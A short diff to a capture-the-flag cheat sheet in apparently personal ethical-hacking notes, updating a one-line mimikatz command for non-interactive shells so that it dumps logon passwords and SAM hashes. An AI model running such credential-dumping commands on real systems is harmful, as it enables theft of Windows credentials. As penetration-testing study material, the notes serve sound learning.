SrivathsanNayak/ethical-hacking-notes/CTFCheatsheet.md

   + test with latest version of the tool in case the standard binary does not work

-  + in case of a non-interactive shell, we can run the binary in a single command without entering the mimikatz prompt - ```.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" exit```
+  + in case of a non-interactive shell, we can run the binary in a single command without entering the mimikatz prompt - ```.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"```